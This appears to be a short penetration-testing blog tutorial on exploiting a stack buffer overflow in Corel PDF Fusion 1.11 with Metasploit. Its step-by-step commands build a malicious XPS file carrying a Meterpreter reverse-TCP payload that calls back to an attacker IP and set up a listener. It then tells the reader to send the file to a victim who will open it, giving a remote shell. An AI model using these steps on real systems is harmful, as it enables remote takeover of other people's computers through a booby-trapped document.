Categories

Archives

Kali Linux, Penetration Testing

Exploit Remote Windows PC using Corel PDF Fusion Stack Buffer Overflow

This module exploits stack-based buffer overflow vulnerability in version 1.11 of Corel PDF Fusion. The vulnerability exists while handling a XPS file with long entry names. In order for the payload to be executed, an attacker must convince the target user to open a specially crafted XPS file with Corel PDF Fusion. By doing so, the attacker can execute arbitrary code as the target user.

Exploit Targets

Corel Pdf 1.11

Requirement

Attacker: Kali Linux

Victim PC: Windows XP SP 3

Open Kali Linux terminal type msfconsole

Now type use exploit/windows/fileformat/corelpdf_fusion_bof

msf exploit (corelpdf_fusion_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (corelpdf_fusion_bof)>set lhost 192.168.1.147 (IP of Local Host)

msf exploit (corelpdf_fusion_bof)>exploit

After we successfully generate the malicious xps File, it will stored on your local computer

/root/.msf4/local/msf.xps

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.147

exploit

Now send your msf.xps files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.